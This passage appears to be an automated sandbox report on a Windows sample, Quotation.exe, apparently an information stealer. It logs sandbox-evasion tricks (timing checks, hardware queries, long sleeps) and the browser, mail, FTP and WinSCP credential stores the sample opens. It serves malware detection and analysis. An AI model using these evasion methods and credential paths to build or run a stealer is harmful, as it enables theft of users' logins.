            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D0C45 push ebx; retf 5_2_000D0C52
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D0C53 push ebx; retf 5_2_000D0C52
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D0CCB push edi; retf 5_2_000D0C7A
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_397976D8 push esp; iretd 5_2_397976E9
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 60786C4
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 2D286C4
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 60204E6 second address: 60204E6 instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 test cl, bl 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FAAD943249Ch 0x0000000a cmp al, bl 0x0000000c test cx, 9B3Ah 0x00000011 inc ebp 0x00000012 cmp cl, 00000062h 0x00000015 inc ebx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 2CD04E6 second address: 2CD04E6 instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 test cl, bl 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FAAD8CDDF0Ch 0x0000000a cmp al, bl 0x0000000c test cx, 9B3Ah 0x00000011 inc ebp 0x00000012 cmp cl, 00000062h 0x00000015 inc ebx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 36210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 38210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199454Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199329Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199094Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198485Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198110Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197488Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197076Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 1518Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 8315Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeEvaded block: after key decisiongraph_0-3127
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 2688Thread sleep count: 1518 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 2688Thread sleep count: 8315 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99745s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99326s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99214s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -99000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -98015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -97031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -96922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1199094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1198110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197488s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3128Thread sleep time: -1197076s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99874Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99745Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99326Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99214Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98890Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97906Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97797Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97687Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97578Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97469Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97359Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97250Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97140Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97031Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96922Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199454Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199329Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199094Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198485Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198110Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197488Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197076Jump to behavior
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs (A
            Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-3016
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040154A PostQuitMessage,LdrInitializeThunk,Sleep,SetForegroundWindow,LdrInitializeThunk,ShowWindow,ShowWindow,ShowWindow,SetFileAttributesW,GetFileAttributesW,SetCurrentDirectoryW,MoveFileW,GetFullPathNameW,GetShortPathNameW,SearchPathW,lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_0040154A
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_70022351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70022351
            Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1212, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1212, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
